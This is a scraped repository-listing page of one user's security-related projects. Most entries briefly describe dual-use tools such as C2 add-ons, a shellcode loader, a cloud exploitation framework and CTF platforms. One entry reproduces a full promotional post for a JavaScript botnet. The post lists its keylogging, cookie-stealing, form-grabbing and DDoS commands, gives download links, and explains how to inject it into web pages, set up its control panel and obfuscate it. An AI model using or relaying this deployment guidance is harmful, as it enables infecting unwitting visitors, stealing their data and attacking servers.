Git Product home page Git Product logo

Eris's Projects

botnet-zoo icon botnet-zoo

整理每个流行botnet家族的专杀脚本、靶机环境、检测规则、病毒样本、病毒原理图

bountyhunterinchina icon bountyhunterinchina

重生之我是赏金猎人系列,分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例

c2-tool-collection icon c2-tool-collection

A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques.

cafe icon cafe

程序员在家饮品制作指南。Programmer's guide about how to make drinks at home (Chinese only).

cardinal icon cardinal

CTF🚩 AWD (Attack with Defense) 线下赛平台 / AWD platform - 欢迎 Star~ ✨

cdb-wds icon cdb-wds

利用白名单文件 cdb.exe 执行 shellcode

cdnstrip icon cdnstrip

Striping CDN IPs from a list of IP Addresses

cf icon cf

Cloud Exploitation Framework 云环境利用框架,方便安全人员在获得 AK 的后续工作

clearjs icon clearjs

🎭 Javascript deobfuscator for obfuscator.io

cloud-9-javascript-botnet-version-2.0 icon cloud-9-javascript-botnet-version-2.0

I have heavily updated the Cloud 9 JavaScript BotNet Old features: FTP flood Cookie stealing Keylogging Send POST requests Flood POST requests Evaluate JavaScript Code Silently load webpages Clickjacking (iframe follow mouse) New features: Layer 4 / Layer 7 hybrid attack (random min-max size POST flood) Formgrabber fixed (I think) Now has config file Now has bots online list OS detection added Panel is much more sleek You no longer get negative bots when bots repeatedly disconnect or some glitch happens RFI scanner added Added ability to send shellshock exploits You can now open pop-unders Non-DDoS commands run only once Many security updates to the panel The features are: Code Stealerz: cookie clipboard Money makerz: view*[url]* jack*[iframe]*[width]*[height]* popunder*[url]* DDoS Methodz: load*[target url]*[milliseconds between requests]* floodpost*[target url]*[params]*[milliseconds between requests]* glype*[target url]*[glype list url]*[milliseconds between requests]* antiddos*[target url]*[milliseconds between requests]* layer4*[target url]*[minSize-maxSize]*[milliseconds between requests]* Exploitz: exploit*[exe url]* rfiscanner*[target url]*[backdoor url]*[rfi vuln list url]* sendshellshock*[target url]*[command]* Misc: md5*[hash]*[brute length]*[brute alphabet]* sha1*[hash]*[brute length]*[brute alphabet]* post*[url]*[params]* eval*[javascript code]* Always running: Multi-Language Web Keylogger Form Grabber Here is the download link to the botnet (all updates will be here): http://robl0x.cf/cloud9-latest.zip Mirror (will also be updated): http://boatnet.us/Archive/Botnet%20Files...latest.zip Unzip the folder on you server Then edit campaign.js and set master to your servers IP Edit admin/panel4829.php and set a new username and password for the cnc panel One way of getting tons of browsers on your net use traffic exchange sites like hitleap.com or 10khits.com To FTP flood use this command: Code load*ftp://website.com:80/*0* That command will exhaust all of the connections on a webserver with only a few browsers All keylogs that are recorded are sent once the page is closed for stealth To infect a page simply put this html on it: http://pastebin.com/ZAvqJZD8 the first inject is reccommended but it only works if a <head> tag exists on the page. Then whoever visits the page will be on the botnet for as long as they are on the page. I suggest putting a movie on the page so people will stay on the botnet for longer. (Good for ddos attacks) For those of you who dont know the purposes of this botnet are: Website monitoring Ad clicks amd views Getting facebook likes (via clickjacking) Distributed hash cracking Distributed Denial of Service (DDoS) Data stealing IP grabbing Exploiting servers and many more! Here is a picture of an active Cloud 9 botnet with 23 clients (this was before OS detection was added) Spoiler (Click to View) Hope you all love the update! If you have any suggestions for new features send me a PM and I should reply in 1-3 days Here is how to set it up: Code You need to change the master variable in campaign.js to something like this: var master = "http://yoursiteorip"; Also change the connection key for security. var connectKey = "randomshithere"; Also be sure to edit config.php and change the connection key to the one in campaign.js Also in the config it is reccommended that you change the location of the log files and other file locations etc. Be sure to rename/move the files to the places you specified in the config. Once you are done those things obfuscate your campaign.js using this JavaScript obfuscator (or a different one) http://javascriptobfuscator.com/Javascript-Obfuscator.aspx That will protect your campaign.js from people figuring out what it is.

cloud-security-vulnerabilities icon cloud-security-vulnerabilities

List of all the Publicly disclosed vulnerabilities of Public Cloud Provider like Amazon Web Services (AWS), Microsoft Azure, Google Cloud, Oracle Cloud, IBM Cloud etc

cloudmare icon cloudmare

Cloudflare, Sucuri, Incapsula real IP tracker.

clovery icon clovery

Cloud Discovery - brute force public AWS, GCP, Alibaba, and Azure cloud services

code-audit icon code-audit

记录代码审计学习的过程,附含源码

codeql icon codeql

《深入理解CodeQL》Finding vulnerabilities with CodeQL.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.